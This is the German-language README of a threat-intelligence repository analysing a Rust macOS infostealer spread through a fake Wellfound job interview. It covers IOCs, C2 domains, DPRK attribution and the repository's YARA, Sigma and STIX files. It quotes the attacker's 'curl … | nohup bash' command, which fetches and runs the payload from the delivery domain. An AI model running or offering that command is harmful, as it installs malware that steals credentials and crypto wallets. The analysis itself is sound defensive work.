
Vollständige statische Analyse von HyperHives macOS Rust infostealer — 571 entschlüsselte Konfigurationswerte, C2-Infrastruktur, DPRK/Contagious Interview Attribution, YARA/Sigma-Regeln, STIX-2.1-Bundle, ATT&CK-Navigator-Layer
Bedrohungsinformationen: Rust-basierter macOS-Universal-Binary-Infostealer, der über eine gefälschte Job-Interview-Pipeline auf Wellfound (ehemals AngelList) ausgeliefert wird. Das Betreiber-Pseudonym „Felix" von „HyperHive" lockte Ziele dazu, einen schädlichen Installer von
macos.hyperhives.netauszuführen. Dieses Repository dokumentiert eine vollständige statische Analyse: 571 entschlüsselte Konfigurationswerte wurden wiederhergestellt, darunter C2-URLs, eine Sentry-DSN und 276 gezielte Chrome-Erweiterungs-IDs.
| Sample SHA-256 | 5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3 |
| C2-Domain | cloudproxy.link |
| Auslieferungs-Domain | macos.hyperhives.net |
| Köder-Plattform | Wellfound (ehemals AngelList) |
| Betreiber-Persona | „Felix" bei „HyperHive" |
| VirusTotal | 9 / 63 Erkennungen |
| Klassifizierung | Öffentliche Offenlegung / IOC-Bundle |
| Zuletzt aktualisiert | April 2026 |
| Datei | Format | Zweck |
|---|---|---|
iocs.txt | Klartext | Hashes, Domains, URLs, IPs, E-Mail, Sentry-IDs – zum Einfügen in Blocklisten, MISP, OpenCTI |
yara_rules.yar | YARA 4.2+ | Hash-Übereinstimmung bekannter Samples + heuristische Zeichenkettenerkennungen für Mach-O |
sigma_rules.yml | Sigma | Proxy-, DNS- und Prozesserstellungsregeln – passen Sie logsource an Ihr SIEM an |
stix/bundle.json | STIX 2.1 | Maschinenlesbares CTI-Bundle mit Indikatoren, Malware-SDO, Infrastruktur, ATT&CK-Mustern und Beziehungen |
attack-navigator-layer.json | ATT&CK Navigator | Importieren Sie diese Datei in den ATT&CK Navigator, um eine visuelle Technikabdeckung zu erhalten |
. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist
---
## Schnellstart
Platziere die Beispiel-Datei als `sample/installer_binary` (siehe [`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md) zur Hash-Überprüfung), dann:```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py
Die Compose-Datei erzwingt network_mode: none, read_only: true und entfernt alle Linux Capabilities. Siehe SECURITY.md für die vollständigen Handhabungsrichtlinien.
Eine Stellenausschreibung auf Wellfound (ehemals AngelList) führte zu einer Multi-E-Mail-Social-Engineering-Kette von einer Betreiber-Persona "Felix" bei "HyperHive". Nachdem der Angreifer den technischen Hintergrund des Ziels geschmeichelt und ein gefälschtes Vorstellungsgespräch vereinbart hatte, forderte er das Opfer auf, das Produkt unter hyperhives.net zu „überprüfen“ und insbesondere Settings → Diagnostics → Log zu untersuchen – ein Vorwand, um die Ausführung von Folgendem auszulösen:```
curl -s https://macos.hyperhives.net/install | nohup bash &
Die Nutzlast ist ein **8,5 MB Mach-O Universal Binary** (x86_64 + arm64), kompiliert in Rust. Eine statische Analyse mit einer abgeschotteten Docker-Laborumgebung und CPU-Emulation von **570 eindeutigen x86_64-Helferroutinen** deckte **alle 571 verschlüsselten Konfigurationswerte** auf und legte offen:
- **C2:** `cloudproxy.link` — vier HTTPS-Endpunkte
- **Sentry (Attributions-Pivot):** vollständige DSN mit Org-/Projekt-IDs auf `ingest.de.sentry.io`
- **Build-Identität:** Cargo-Benutzer `rootr`, Codenamen `force`, Version `9.12.1`
- **Ziele:** 276 Chrome-Erweiterungs-IDs (Krypto-Wallets, Passwortmanager, Unternehmensanmeldedaten)
Die Taktiken decken sich mit **DPRK-verknüpften Contagious-Interview-Kampagnen** — vorgetäuschte Stellenanzeigen auf legitimen Plattformen, mehrstufiger Vertrauensaufbau, `curl | bash`-Auslieferung, Rust-macOS-Stealer und kryptofokussierte Exfiltration.
---
## 1 — Wie es begann